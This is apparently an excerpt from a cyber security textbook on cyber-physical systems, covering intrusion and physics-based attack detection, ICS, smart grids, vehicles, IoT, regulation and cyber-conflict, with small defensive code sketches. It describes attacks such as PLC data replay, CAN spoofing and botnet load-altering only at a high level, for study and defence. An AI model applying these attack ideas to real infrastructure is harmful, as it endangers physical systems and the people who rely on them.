systems with minimal silicon requirements. For example, the Trusted Computing Group (TCG)
is working, through its Device Identifier Composition Engine (DICE), on combining simple
hardware capabilities to establish strong identity, attest software and security policy, and
assist in deploying software updates. We finalise our description of attestation by pointing
out that most of the practical proposals for attestation work at initialisation, but building
practical run-time attestation solutions remains a difficult challenge.
Network Intrusion Detection: The second category of solutions for detecting attacks relies
on monitoring the interactions of CPS devices. In contrast with classical IT systems, where
simple Finite-State models of network communications will fail, CPSs exhibit comparatively
simpler network behaviour: servers change less frequently, there is a more stable network
topology, a smaller user population, regular communication patterns, and networks host
a smaller number of protocols. Therefore, intrusion detection systems, anomaly detection
algorithms, and whitelisting access controls are easier to design and deploy than in classical
IT systems [2005]. If the CPS designer can give a specification of the intended behaviour of the
network, then any non-specified traffic can be flagged as an anomaly [2006]. Because most
of the communications in CPS networks are between machines (with no human intervention),
they happen automatically and periodically, and given their regularity, these communication
patterns may be captured by finite state models like Deterministic Finite Automata [2007, 2008]
or via Discrete-Time Markov Chains [2009, 2010]. While network specification is in general
easier in CPS environments when compared to IT, it is still notoriously difficult to maintain.
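A minimal C sketch of such specification-based monitoring is shown below: traffic is checked against a whitelist of (source, destination, function code) tuples derived from the expected communication pattern, and anything else is flagged. The addresses and Modbus-style function codes are illustrative.

    #include <stdint.h>

    /* Specification-based monitoring sketch: only message tuples that
       match the expected traffic pattern are allowed; everything else
       raises an alert. */
    typedef struct { uint32_t src, dst; uint16_t func; } msg_t;

    #define RULES 3
    static const msg_t whitelist[RULES] = {
        {10, 20, 0x03},   /* server reads registers from PLC */
        {10, 20, 0x10},   /* server writes setpoints to PLC  */
        {20, 10, 0x03},   /* PLC response                    */
    };

    int is_allowed(const msg_t *m) {
        for (int i = 0; i < RULES; i++)
            if (m->src == whitelist[i].src && m->dst == whitelist[i].dst &&
                m->func == whitelist[i].func)
                return 1;
        return 0;         /* unspecified traffic: flag as an anomaly */
    }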
Physics-Based Attack Detection: The major distinction of control systems with respect to
other IT systems is the interaction of the control system with the physical world. In contrast
to work in CPS intrusion detection that focuses on monitoring “cyber” patterns, another line of
work studies how monitoring sensor (and actuation) values from physical observations, and
control signals sent to actuators, can be used to detect attacks; this approach is usually called
physics-based attack detection [1974]. The models of the physical variables in the system
(their correlations in time and space) can be purely data-driven [2011], or based on physical
models of the system [1934]. There are two main classes of physical anomalies: historical
anomalies and physical-law anomalies.
Historical Anomalies: these identify physical configurations that have not been seen before. A
typical example is to place limits on the observed behaviour of a variable [2012]. For example,
if during the learning phase a water level in a tank is always between 1m and 2m, then if the
water level ever goes above or below these values, we can raise an alert. Machine learning
models of the historical behaviour of the variables can also capture historical correlations
between variables; for example, the fact that when the water level of one tank is high, the
water level of a second tank in the process is always low [2013]. One problem with historical
anomalies is that they might generate a large number of false alarms.
Physical-Law Anomalies: A complementary approach to historical observations, which may
have fewer false alarms, is to create models of the physical evolution of the system. For
example, if we have a sensor that monitors the height of a bouncing ball, then we know that
this height follows the differential equations derived from Newton’s laws of mechanics. Thus,
if a sensor reports a trajectory that is not plausible given the laws of physics, we can
immediately identify that something is not right with the sensor (a fault or an attack). Similarly,
the physical properties of water systems (fluid dynamics) or the power grid (electromagnetic
laws) can be used to create time-series models that we can then use to confirm that the control
commands sent to the field were executed correctly and that the information coming from
sensors is consistent with the expected behaviour of the system. For example, if we open an
intake valve, we should expect the water level in the tank to rise; otherwise, we may have a
problem with the controller, the actuator or the sensor. Models of the physical evolution of the
system have been shown to be better at limiting the short-term impact of stealthy attacks (i.e.,
attacks where the attacker creates a malicious signal that is within the margin of error of our
physical models) [2014]. However, if the attack persists for a long time and drives the system
to an unsafe region by carefully selecting a physically plausible trajectory, then historical
models can help in detecting this previously unseen state [2015].
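To make the residual idea concrete, the following C sketch, under an assumed toy mass-balance model of a tank, predicts the next level and flags measurements that deviate from the prediction by more than a threshold; the model, parameters and threshold are illustrative only.

    #include <math.h>

    /* Predict the next tank level from a toy mass-balance model. */
    double predict_level(double level, double inflow, double dt) {
        return level + dt * (inflow - 0.2 * level);   /* toy dynamics */
    }

    /* Returns 1 if the reported measurement is physically plausible,
       0 if its residual exceeds the threshold (fault or attack). */
    int plausible(double predicted, double measured, double threshold) {
        return fabs(measured - predicted) <= threshold;
    }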
In addition to the physics of the system being controlled, devices (such as actuators) have
dynamics as well, and these physical properties can also be used to monitor the proper
behaviour of devices [2016].
Out-of-band Detection: Another way to passively monitor the physical system is through
out-of-band channels [2017]. For example, Radio Frequency-based Distributed Intrusion Detec-
tion [2018] monitors the radio frequency emissions from a power grid substation in order to
check if there is malicious switching of circuit breakers, transformer tap changes, or any
activation of protection relays without a direct request from the SCADA server. The basic idea
is to correlate the control commands sent by the SCADA server with the radio frequency
emissions observed in the substation. A potential drawback of this approach is that attackers
can launch RF attacks mimicking the activation of a variety of electric systems, which can lead
to security analysts losing confidence in the veracity of the alerts.
Active Detection: In addition to passively monitoring a CPS, an intrusion detection system can
actively query devices to detect anomalies in how devices respond to these requests [2019].
In addition to a network query, the intrusion detection system can also send a physical chal-
lenge to change the system’s physical behaviour. This approach is also known as physical
attestation [2013, 2020, 2021], where a control signal is used to alter the physical world, and
in response, it expects to see the changes done in the physical world reflected in the sensor
values. For example, we can send signals to change the network topology of the power grid
to see if the sensors report this expected change [2022], use a change in the field of vision of
a camera to detect hacked surveillance cameras [2023], or use a watermarking signal in a
control algorithm [2024]. The concept of active detection is related to research on moving
target defence applied to cyber-physical systems [2025, 2026, 2027, 2028]. However, both
active detection and moving target defence might impose unnecessary perturbations on a
system by changing the physical world for security purposes. Therefore, these techniques
might be too invasive and costly, and the practicality of some of these approaches is uncertain.
Control systems have a layered hierarchy [1905], which can be used for network segmentation
and to ensure access control. Figure 21.5 shows an illustration of the lower layers of this
hierarchy.
The top layers operate using mostly traditional Information Technology: computers, operating
systems, and related software. They control the business logistic system, which manages the
basic plant production schedule, material use, shipping and inventory levels, and also plant
performance, and keep data historians for data-driven analytics (e.g., predictive maintenance).
The supervisory control layer is where the Supervisory Control and Data Acquisition (SCADA)
systems and other servers communicate with remote control equipment like Programmable
Logic Controllers (PLCs) and Remote Terminal Units (RTUs). The communication between
servers in a control room and this control equipment is done via a Supervisory Control
Network (SCN).
Regulatory control is done at the lower layer, which involves instrumentation in the field, such
as sensors (thermometers, tachometers, etc.) and actuators (pumps, valves, etc.). While
traditionally this interface has been analogue (e.g., 4-20 milliamperes), the growing number
of sensors and actuators, as well as their increased intelligence and capabilities, has given rise
to new Field Communication Networks (FCNs) where the PLCs and other types of controllers
interface with remote Input/Output boxes or directly with sensors and actuators using new
Ethernet-based industrial protocols like ENIP and PROFINET, and wireless networks like
WirelessHART. Several ring topologies have also been proposed to avoid a single point of
failure for these networks, such as the use of Device Level Ring (DLR) over ENIP.
SCN and FCN networks represent Operational Technology (OT) networks, and they have
different communication requirements and different industrial network protocols. While an
SCN can tolerate delays of up to the order of seconds, an FCN typically requires communication
delays an order of magnitude lower, typically enabling communications between devices with a
period of 400 µs.
Intrusion detection is a popular research topic for protecting control systems, and this includes
using network security monitors adapted to industrial protocols [2005, 2007, 2008, 2009, 2010,
2056, 2057], and physics-based anomaly detection [1934, 2011, 2012, 2014, 2058, 2059]. The
layer where we monitor the physics of the system can have a significant impact on the types
of attacks that can be detected [2060].
In particular the adversary can compromise and launch attacks from (1) SCADA servers [2061],
(2) controllers/PLCs [2062], (3) sensors [1933], and (4) actuators [2063], and each of these
attacks can be observable at different layers of the system.
Most of the work on network security monitoring for industrial control systems has deployed
network intrusion detection systems at the SCN. However, if an anomaly detection system
is only deployed in the supervisory control network then a compromised PLC can send ma-
nipulated data to the field network, while pretending to report that everything is normal back
to the supervisory control network. In the Stuxnet attack, the attacker compromised a PLC
(Siemens 315) and sent a manipulated control signal ua (which was different from the original
u, i.e., ua ≠ u). Upon reception of ua, the frequency converters periodically increased and
decreased the rotor speeds well above and below their intended operation levels. While the
status of the frequency converters y was then relayed back to the PLC, the compromised
PLC reported a manipulated value ya ≠ y to the control centre (claiming that devices were
operating normally). A similar attack was performed against the Siemens 417 controller [2062],
where attackers captured 21 seconds of valid sensor variables at the PLC, and then replayed
them continuously for the duration of the attack, ensuring that the data sent through the SCN
to the SCADA monitors would appear normal [2062]. A systematic study of the detectability of
various ICS attacks (controller, sensor, or actuator attacks) was given by Giraldo et al. [2060],
and the final recommendation is to deploy system monitors at the field network, as well as at
the supervisory network, and across different loops of the control system.
In addition to attack detection, preventing the system from reaching unsafe states is also
an active area of research [1943, 2064, 2065, 2066, 2067]. The basic idea is to identify that
a control action can cause a problem in the system, and therefore a reference monitor will
prevent this control signal from reaching the physical system. Other research areas include
the retrofitting of security in legacy systems [1988, 2068], and malware in industrial control
devices [2069, 2070]. A concise survey of research in ICS security was given by Krotofil and
Gollmann [2071], and reviews of state-of-the-art practices in the field of ICS security include
the work of Knowles et al. and Cherdantseva et al. [1980, 2072].
A problem for studying industrial control systems is the diversity of platforms, including the
diversity of devices (different manufacturers with different technologies) and applications
(water, chemical systems, oil and gas, etc.). Therefore one of the big challenges in this space
is the reproducibility of results and the generality of industrial control testbeds [2073].
While the current power grid architecture has served well for many years, there is a growing
need to modernise the world’s electric grids to address new requirements and to take ad-
vantage of the new technologies. This modernisation includes the integration of renewable
sources of energy, the deployment of smart meters, the exchange of electricity between
consumers and the grid, etc. Figure 21.6 illustrates some of these concepts. The rationale for
modernising the power grid includes the following reasons:
[Figure 21.6: smart grid concepts, including wide-area monitoring with phasor measurement units, smart relays, large-capacity batteries, smart meters, renewable energy sources, energy management systems, smart appliances, plug-in vehicles, and one-way versus two-way electricity flows between the grid and customers.]
Efficiency: One of the main drivers of smart grid programs is the need to make more
efficient use of current assets. The peak demand for electricity grows every year, and so utility
companies need to spend more money each year on new power plants and their associated
infrastructure. However, the capacity needed to satisfy peak demand is only required 16% of
the time, and so this equipment remains idle for the rest of the time. One of the goals of the
smart grid is to change the grid from load following to load shaping by giving incentives to
consumers to reduce electricity consumption at times of peak demand. Reducing peak
demand, in addition to increasing grid stability, can enable utilities to postpone or avoid the
construction of new power stations. The control or incentive actions used to shape the load
are usually called Demand Response.
Efficiency also deals with the integration of the new and renewable generation sources, such
as wind and solar power with the aim of reducing the carbon footprint.
Reliability: The second main objective of modernising the power grid is reliability, especially at
the distribution layer (the transmission layer is more reliable). By deploying new sensors and
actuators throughout the power grid, operators can receive real-time, fine-grained data about
the status of the power grid, that enables better situational awareness, faster detection of
faults (or attacks), and better control of the system, resulting in fewer outages. For example,
the deployment of smart meters is allowing distribution utilities to automatically identify the
location and source of an outage.
Consumer choice: The third objective is to address the lack of transparency that the current
power grid provides to consumers. Currently, most consumers receive only monthly updates
about their energy usage. In general, consumers do not know how much electricity they
consume or the prices they are paying at different times of the day. They are also not informed
about other important aspects of their consumption, such as the proportion of electricity that
was generated from renewable resources. Such information can be used to shape usage
patterns (i.e., the load). One of the goals of the smart grid is to offer consumers real-time data
and analytics about their energy use. Smart appliances and energy management systems will
automate homes and businesses according to consumer preferences, such as saving costs
or making sure more renewable energy is consumed.
To achieve these objectives, the major initiatives associated with the smart grid are the ad-
vanced metering infrastructure, demand response, transmission and distribution automation,
distributed energy resources, and the integration of electric vehicles.
While modernising the power grid will bring many advantages, it can also create new threat
vectors. For example, by increasing the amount of consumer information collected, new
forms of attack become possible [2083]. Smart grid technologies can be used to infer the
location and behaviour of users, including whether they are at home, the amount of energy
they consume, and the types of devices they own [2084, 2085].
In addition to new privacy threats, another potential new attack has been referred to as a
load-altering attack. Load-altering attacks have been previously studied in demand-response
systems [2086, 2087, 2088, 2089, 2090, 2091]. Demand-response programs provide a new
mechanism for controlling the demand of electricity to improve power grid stability and
energy efficiency. In their basic form, demand-response programs provide incentives (e.g., via
dynamic pricing) for consumers to reduce electricity consumption during peak hours. Currently,
these programs are mostly used by large commercial consumers and government agencies
managing large campuses and buildings, and their operation is based on informal incentive
signals via phone calls by the utility or by the demand-response provider (e.g., a company
such as Enel X) asking the consumer to lower their energy consumption during the peak
times. As these programs become more widespread (targeting residential consumers) and
automated (giving utilities or demand-response companies the ability to directly control the
load of their customers remotely), the attack surface for load-altering attacks will increase. The
proposed attacks assume that the adversary has gained access to the company controlling
remote loads and can alter a large amount of load to affect the power system, causing
inefficiencies, economic profit for the attacker, or potentially enough load change to alter the
frequency of the power grid and trigger large-scale blackouts. Demand-response systems can
be generalised by transactive energy markets,
where prosumers (consumers with energy generation and storage capabilities) can trade
energy with each other, bringing their own privacy and security challenges [2092].
More recently Soltan et al. [2093] studied the same type of load-altering attacks but when the
attacker creates a large-scale botnet with hundreds of thousands of high-energy IoT devices
(such as water heaters and air conditioners). With such a big botnet the attacker can cause (i)
frequency instabilities, (ii) line failures, and (iii) increased operating costs. A follow-up work
by Huang et al. [2094] showed that creating a system blackout (which would require a black
start period of several days to restart the grid), or even a blackout of a large percentage of the
bulk power grid, can be very difficult, in part because the power grid has several protections
against load changes, including under-frequency load shedding.
Software problems in the sensors of vehicles can cause notorious failures, such as the Ariane 5
rocket accident [2107], which was caused by a software fault that shut down the inertial
navigation system, causing incorrect signals to be sent to the engines. With advances in manufacturing
and modern sensors, we are starting to see the proliferation of Unmanned Vehicles (UVs) in
the consumer market as well as across other industries. Devices that were only available to
government agencies have diversified their applications ranging from agricultural manage-
ment to aerial mapping and freight transportation [2108]. Out of all the UVs available in the
commercial market (aerial, ground and sea vehicles), unmanned aerial vehicles seem to be
the most popular kind with a projected 11.2 billion dollar global market by 2020 [2109].
The expansion of unmanned aerial vehicles has increased security and privacy concerns. In
general, there is a lack of security standards for drones and it has been shown that they are
vulnerable to attacks that target their cyber and/or physical elements [2052, 2110]. From
the point of view of privacy, drones can let users spy on neighbours [2111, 2112], and enable
literal helicopter parenting [2113].
Reported incidents include attackers remotely accessing someone else's drone (e.g., a
neighbour's) to take photos or videos, stealing drones wirelessly (e.g., an attacker in a vehicle
can take over a drone and command it to follow the vehicle), and taking down a drone operated
by someone else (which can lead to charges like mishandling a drone in public, which in turn
has resulted in reckless endangerment convictions) [1939].
UVs have multiple sensors that help them assess their physical environment, such as
accelerometers, gyroscopes, barometers, GPS and cameras. While reliance on sensor data
without any form of validation has proven to be an effective trade-off in order to maintain the
efficiency demands of real-time systems, it is not a sustainable practice as UVs become more
pervasive. Transduction attacks on sensors have shown that accelerometers, gyroscopes,
and even cameras used by drones for stabilisation can be easily attacked, causing the drone
to malfunction, crash, or even be taken over by the attacker [1951, 1998, 2114].
Even on many operational warships, remote monitoring of equipment is now done with a
hardwired LAN by systems such as the Integrated Condition Assessment System (ICAS) [2115].
ICAS are generally installed with connections to external Programmable Logic Controllers
(PLCs), which are used in Supervisory Control and Data Acquisition (SCADA) systems to direct
the movement of control equipment that performs actual manipulation of physical devices in
the ship such as propulsion and steering (rudder) devices [2115, 2116]. Therefore, the secure
operation of ships is highly related to the security of industrial control systems.
For ground vehicles, one of the areas of interest is the security of the Controller Area Network
(CAN). The CAN system is a serial broadcast bus designed by Bosch in 1983 to enable the
communication of Electronic Control Units (ECUs) in cars. Examples of ECUs include brake
systems, the central timing module, telematic control units, gear control, and engine control.
The CAN protocol, however, does not have any security mechanism, and therefore an attacker
who can enter the CAN bus in a vehicle (e.g., through a local or remote exploit) can spoof
any ECU, ignore the input from drivers, and disable the brakes or stop the engine [2117].
Therefore, research has considered ways to retrofit lightweight security mechanisms for
CAN systems [1791], or how to detect spoofed CAN messages based on the physical-layer
characteristics of the signal [2118] (voltage level profiles, timing, frequency of messages, etc.).
However, the security of some of these systems remains in question [2119].
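As an illustration of the timing-based detection idea mentioned above, the hedged sketch below flags CAN frames whose inter-arrival time deviates from the sender's known transmission period. The CAN ID, period, and tolerance are hypothetical values chosen for illustration, not taken from any specific vehicle.

```python
# Sketch of a timing-based CAN spoofing heuristic: many ECUs transmit a
# given CAN ID periodically, so a spoofed frame often shows up as an
# anomalous inter-arrival time for that ID.
from collections import defaultdict

EXPECTED_PERIOD = {0x123: 0.010}   # hypothetical: an ECU sends ID 0x123 every 10 ms
TOLERANCE = 0.3                    # tolerate +/-30% jitter (assumption)

last_seen = defaultdict(lambda: None)

def check_frame(can_id, timestamp):
    """Return True if the frame's timing is consistent with its expected period."""
    prev = last_seen[can_id]
    last_seen[can_id] = timestamp
    period = EXPECTED_PERIOD.get(can_id)
    if prev is None or period is None:
        return True                # no baseline yet, or unmonitored ID
    gap = timestamp - prev
    # A spoofed frame typically arrives well before the next legitimate one.
    return abs(gap - period) <= TOLERANCE * period

print(check_frame(0x123, 0.000))   # True (establishes the baseline)
print(check_frame(0x123, 0.002))   # False -> possible spoofed message
```

In practice such timing checks are combined with the physical-layer features cited above (voltage profiles, clock skew), since a well-placed attacker can attempt to mimic message timing.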
Autonomous vehicles will also face new threats, for example, a malicious vehicle in an auto-
mated platoon can cause the platoon to behave erratically, potentially causing accidents [2120].
Finally, new functionalities like a remote kill-switch can be abused by attackers, for example,
an attacker remotely deactivated hundreds of vehicles in Austin, Texas, leaving their owners
without transportation [2121].
in direct contact with the patient. This “secret” information is then used by the programmer
and the IMD as a fuzzy password to bootstrap their security association.
A key challenge is to make sure that the biometric signal used to grant access via
touch-to-access is not remotely observable. However, heart beats can be inferred with side
information including a webcam [2128], and an infrared laser [2129].
Security goes beyond implantable devices. As healthcare computer and software infrastructure
introduces new technology, the industry will need to increase its security efforts. Medical data
is a prime target for theft and privacy violations, and healthcare systems also face denial-of-
service attacks in the form of ransomware [2130].
Several of the security solutions for consumer IoT have proposed the idea of having a cen-
tralised IoT secure hub that mediates the communications between IoT devices in a home,
and the Internet [2137]. One of the problems of relying on an external device to mediate
IoT communications is that the connections between IoT devices and their cloud servers may
be encrypted, and therefore this hub will need to make security decisions with encrypted
traffic [2138]. On the other hand, end-to-end encrypted communications can also prevent
consumers from auditing their IoT devices to make sure they are not violating their privacy
expectations. One option to address this problem is to ask the vendor of the IoT device to
disclose their key (and rotate their key) to a trusted third party (called “auditor”) that can
decrypt and show the results to the owners of the data [2139].
In short, the proliferation of vulnerable IoT devices is raising new security and privacy concerns,
while making IoT devices attractive to attackers. Insecurities in these devices range from
insecure-by-design implementations (e.g., devices that have backdoors for troubleshooting)
to their inability to apply software updates to patch vulnerable firmware. One of the biggest
problems for improving the security of IoT and CPSs is that market forces do not incentivise
vendors to compete for better security. In the next section we will discuss the causes of this
lack of security and some potential solutions.
will stifle innovation, and that more regulation tends to create a culture of compliance instead
of a culture of security.
Some states in the US are starting to take regulation into their hands; for example, the recently
proposed California Senate Bill SB-327 will make California the first state in the US with an
IoT cyber security law: starting in 2020, any manufacturer of a device that connects “directly
or indirectly” to the Internet must equip it with “reasonable” security features, designed to
prevent unauthorised access, modification, or information disclosure.
The European Union Agency for Cybersecurity proposed the EU Network and Information
Security directive [2146] as the first piece of EU-wide cyber security legislation, under which
operators of essential services, such as those outlined in this KA, have to comply with a new
set of security standards.
Another alternative to imposing regulation broadly is to use the governments’ “power of the
purse” by mandating cyber security standards only to companies that want to do business
with the government. The goal would be that once the best security practices are developed
to meet the standards for working with the government, then they will spread to other markets
and products. This approach is a reasonable balance between incentives and regulation. Only
CPS and IoT vendors working with the Federal government will have to follow specific security
standards, but once implemented, the same security standards will benefit other
markets that reuse these technologies.
One of the notable exceptions to the lack of regulation is the nuclear energy industry. Because
of the highly safety-critical nature of this industry, nuclear energy is highly regulated in general,
and in its cyber security standards in particular, with processes such as the Office for Nuclear
Regulation (ONR) Security Assessment Principles in the UK [2147].
Incentives: A complementary way to nudge companies to improve their cyber security posture
is for governments to nurture a cyber-insurance market for CPS protection. So, instead of
asking companies to follow specific standards, governments would require firms to have
cyber-insurance for their operations [2148, 2149, 2150, 2151]. There is a popular view that under
certain conditions, the insurance industry can incentivise investments in protection [2152]. The
idea is that premiums charged by the insurance companies would reflect the cyber security
posture of CPS companies; if a company follows good cyber security practices, the insurance
premiums would be low, otherwise, the premiums would be very expensive (and this would in
principle incentivise the company to invest more in cyber security protections). It is not clear
if this cyber-insurance market will grow organically, or if it would need to be mandated by the
government.
It is unclear whether improving CPS security through government incentives will first require a
catastrophic cyber-attack, but it appears that, in the future, the choice will no longer be between
government regulation and no regulation, but between smart regulation and stupid
regulation [2140].
21.4.2 Cyber-Conflict
Computer networks extend the way we interact with others, and any conflict in the real
world will have its representation in cyberspace, including (cyber-)crime, activism,
bullying, espionage, and war [1916].
Cybercriminals compromise computers anywhere they can find them (even in control sys-
tems). These attacks may not be targeted (i.e., they do not have the intention of harming
control systems), but may cause negative side effects: control systems infected with malware
may operate inappropriately. The most famous non-targeted attack on control systems oc-
curred in 2003, when the Slammer worm affected the computerised safety monitoring system
at the Davis-Besse nuclear power plant in the US. While the plant was not connected to the
Internet, the worm entered the plant network via a contractor’s infected computer connected by
telephone directly to the plant’s network, thereby bypassing the firewall [1954]. A more recent
example of a non-targeted attack occurred in 2006, when a computer system that managed
the water treatment operations of a water filtering plant near Harrisburg, Pennsylvania, was
compromised and used to send spam and redistribute illegal software [1955]. More recently,
ransomware has also been used to attack CPSs, like the attack on the Austrian hotel [1961],
where guests were unable to get their room keys activated until the hotel paid the ransom.
Disgruntled employees are a major source of targeted computer attacks against control
systems [780, 1960, 1963]. These attacks are important from a security point of view because
they are caused by insiders: individuals with authorised access to computers and networks
used by control systems. So, even if the systems had proper authentication and authorisation,
as well as little information publicly available about them, attacks by insiders would still be
possible. Because disgruntled employees generally act alone, the potential consequences
of their attacks may not be as damaging as the potential harm caused by larger organised
groups such as terrorists and nation states.
Terrorists and activists are another potential threat to control systems. While there is no
concrete evidence that terrorists or activists have targeted control systems via cyber-attacks,
there is a growing threat of such an attack in the future.
Nation states are establishing military units with computer security expertise for any future
conflicts. For example, the US established Cyber Command [2153] to conduct full spectrum
operations (offensive capabilities) in 2009, and several other countries also announced similar
efforts around the same time. The role of computer networks in warfare has been a topic of
academic discussion since 1998 [2154], and CPSs are playing a foundational role in how
how wars are waged, from robotic units and unmanned vehicles supporting soldiers in the
field, to discussions of cyberwar [2155].
In addition to land, air, sea and space, cyberspace is now considered by many nations as an
additional theatre of conflict. International treaties have developed public international law
concerning two main principles in the law of war: (1) jus ad bellum, the right to wage a war, and
(2) jus in bello, acceptable wartime conduct. Two sources have considered how the law of
war applies to cyberspace [2141]: (1) the Tallinn Manual, and (2) the Koh Speech.
The Tallinn Manual is a non-binding study by NATO’s Cooperative Cyber Defence Centre of
Excellence on how the law of war applies to cyber conflicts, and the Koh Speech was a
speech given by Harold Koh, a US State Department legal advisor, which explained how the
US interprets international law applied to cyberspace. Both of these sources agree that a key
reason to authorise the use of force (jus ad bellum) as a response to a cyber operation, is
when the physical effects of a cyber-attack are comparable to kinetic effects of other armed
conflicts, for example, when a computer attack triggers a nuclear plant meltdown, opens a dam
upriver, or disables air-traffic control. The argument is that the effects of any of these attacks
are similar to what a missile strike from an enemy would look like. In contrast, when there is
no physical harm, the problem of determining when a cyber-attack can be considered a use of
force by the enemy is unresolved, so cyber-attacks on the financial or election infrastructure
of a nation may not clear the bar to be considered an act of war.
Once nations are engaged in war, the question is how to leverage computer attacks in a way
that is consistent with acceptable wartime conduct (jus in bello). The conventional norm is
that attacks must distinguish between military and non-military objectives. Military objectives
can include war-fighting, war-supporting, and war-sustaining efforts. The problem in attacking
critical infrastructures is that some of the infrastructures supporting these efforts are in
dual-use by the military as well as by the civilian population. For example, a large percentage
of military communications in the US use civilian networks at some stage, and the power grid
supports military as well as civilian infrastructures.
Another factor to consider in designing CPS attacks is that the “law of war” in general prohibits
uncontrollable or unpredictable attacks, in particular those that deprive the civilian population
of indispensable objects, such as food or water. While physical weapons have a limited
geographical area of impact, cyberweapons can have more uncontrollable side-effects; for
example, worms can replicate and escape their intended target network and infect civilian
infrastructures. Therefore, nations will have to extensively test any cyberweapon to minimise
unpredictable consequences.
In short, any future conflict in the physical world will have enabling technologies in the cyber-
world, and computer attacks may be expected to play an integral part in future conflicts. There
is a large grey area regarding what types of computer attacks can be considered an act of
force, and a future challenge will be to design cyber-attacks that only target military objectives
and minimise civilian side effects. At the same time, attack attribution in cyber-space will
be harder, and nation-states might be able to get away with sabotage operations without
facing consequences. It is the responsibility of the international community to design new legal
frameworks to cover cyber-conflicts, and for nation states to outline new doctrines covering
how to conduct cyber-operations with physical side effects.
Finally, cyberwar is also related to the discussion in the last section about cyber-insurance. For
example, after the NotPetya cyberattack in 2017 [2156], several companies who had purchased
cyber-insurance protections sought to get help from their insurance companies to cover part
of their losses. However, some insurance companies denied the claims, citing a war exclusion
which protects insurers from being saddled with costs related to damage from war. Since
then, insurers have been applying the war exemption to avoid claims related to digital attacks2 .
This type of collateral damage from cyber-attacks might be more common in the future, and
presents a challenge for insurance industries in their quest to quantify the risk of correlated
large-scale events.
2
https://www.nytimes.com/2019/04/15/technology/cyberinsurance-notpetya-attack.html
standard builds closely on the UK’s Code of Practice for Consumer IoT Security [2160]. Another
more specific IoT standard by the Internet Engineering Task Force (IETF) for IoT devices is
the Manufacturer Usage Description (MUD) standard [2161]. The goal of this standard is to
automate the creation of network whitelists, which are used by network administrators to
block any unauthorised connection by the device. Other IoT security standards being devel-
oped by the IETF include protocols for communications security, access control, restricting
communications, and firmware and software updates [2162].
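To make the MUD idea concrete, the following hedged sketch shows a simplified, MUD-style manufacturer description and the default-deny whitelist check a network could derive from it. The field names and hosts are hypothetical simplifications for illustration, not the exact RFC 8520 YANG schema used by real MUD files.

```python
# Simplified illustration of the MUD idea: a manufacturer publishes the
# endpoints its device legitimately needs, and the network enforces a
# default-deny whitelist derived from that description. Field names and
# hosts below are hypothetical, not the actual MUD (RFC 8520) schema.

mud_like_description = {
    "mud-url": "https://vendor.example/lightbulb.json",  # hypothetical vendor URL
    "systeminfo": "Smart light bulb",
    "allowed-flows": [
        {"dst-host": "update.vendor.example", "protocol": "tcp", "dst-port": 443},
        {"dst-host": "ntp.vendor.example",    "protocol": "udp", "dst-port": 123},
    ],
}

def is_allowed(dst_host, protocol, dst_port):
    """Default-deny policy: permit only flows listed by the manufacturer."""
    return any(
        f["dst-host"] == dst_host
        and f["protocol"] == protocol
        and f["dst-port"] == dst_port
        for f in mud_like_description["allowed-flows"]
    )

print(is_allowed("update.vendor.example", "tcp", 443))  # True  -> permitted
print(is_allowed("botnet-c2.example", "tcp", 6667))     # False -> blocked
```

The design choice is that the device vendor, who knows the device's intended behaviour, publishes the policy, while the local network (e.g., a router or IoT hub) enforces it, so a compromised device cannot silently open new connections.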
All these industry efforts and standards have essentially three goals: (1) create awareness of
security issues in control systems, (2) help operators of control systems and security officers
design a security policy, and (3) recommend basic security mechanisms for prevention
(authentication, access controls, etc.), detection, and response to security breaches. For the
most part, industry efforts for protecting CPSs are based on the same technical principles
as general Information Technology systems. Therefore, industry best practices lag behind
general IT security best practices and the most recent CPS security research discussed in
this KA. We hope that in the next decade CPS security research becomes mature enough to
start having an impact on industry practices.
CONCLUSIONS
As technology continues to integrate computing, networking, and control elements in new
cyber-physical systems, we also need to train a new generation of engineers, computer
scientists, and social scientists able to capture the multidisciplinary nature of CPS security,
exemplified by problems like transduction attacks. In addition, as the technologies behind
CPS security mature, some of them will become industry-accepted best practices while others
might be forgotten. As of 2018, one of the areas with the greatest momentum is the industry for
network security monitoring (intrusion detection) in cyber-physical networks. Several start-up
companies in the US, Europe,
and Israel offer services for profiling and characterising industrial networks, to help operators
better understand what is allowed and what should be blocked. On the other hand, there are
other CPS security research areas that are just starting to be analysed, like the work on attack
mitigation, and in particular, the response to alerts from intrusion detection systems.
We are only at the starting point for CPS security research, and the decades to come will bring
new challenges as we continue to integrate physical things with computing capabilities.
CROSS-REFERENCE OF TOPICS VS REFERENCE MATERIAL

Section                                                     [2163]     Other
21.1 Cyber-Physical Systems and their Security Risks
    21.1.1 Characteristics of CPS                           c1         [1906]
    21.1.2 Protections Against Natural Events and Accidents            [1907]
    21.1.3 Security and Privacy Concerns                               [1908]
21.2 Crosscutting Security
    21.2.1 Preventing Attacks                               c6,c9      [1973]
    21.2.2 Detecting Attacks                                c18        [1974]
    21.2.3 Mitigating Attacks                                          [1975]
21.3 CPS Domains
    21.3.1 Industrial Control Systems                                  [2048]
    21.3.2 Electric Power Grids                             c25        [2049, 2050]
    21.3.3 Transportation Systems and Autonomous Vehicles   c26,c29    [2051, 2052]
    21.3.4 Robotics and Advanced Manufacturing                         [2053]
    21.3.5 Medical Devices                                  c27        [2054]
    21.3.6 The Internet of Things                                      [1973]
21.4 Policy and Political Aspects of CPS Security
    21.4.1 Incentives and Regulation                                   [2140]
    21.4.2 Cyber-Conflict                                              [2124, 2141]
    21.4.3 Industry Practices and Standards                            [2048]
INTRODUCTION
This Knowledge Area is a review of the most relevant topics in wireless physical layer security.
The physical phenomenon utilised by the techniques presented in this Knowledge Area is the
radiation of electromagnetic waves. The frequencies considered hereinafter consist of the
entire spectrum that ranges from a few Hertz to frequencies beyond those of visible light
(optical spectrum). This Knowledge Area covers concepts and techniques that exploit the
way these signals propagate through the air and other transmission media. It is organised
into sections that describe security mechanisms for wireless communication methods as
well as some implications of unintended radio frequency emanations.
Since most frequencies used for wireless communication reside in the radio frequency spec-
trum and follow the well-understood laws of radio propagation theory, the majority of this
Knowledge Area is dedicated to security concepts based on physical aspects of radio fre-
quency transmission. The chapter therefore starts with an explanation of the fundamental
concepts and main techniques that were developed to make use of the wireless communi-
cation layer for confidentiality, integrity, access control and covert communication. These
techniques mainly use properties of physical layer modulations and signal propagation to
enhance the security of systems.
After having presented schemes to secure the wireless channel, the Knowledge Area continues
with a review of security issues related to the wireless physical layer, focusing on those aspects
that make wireless communication systems different from wired systems, most notably signal
jamming, signal annihilation and jamming resilience. The section on jamming is followed
by a review of techniques capable of performing physical device identification (i.e., device
fingerprinting) by extracting unique characteristics from the device’s (analogue) circuitry.
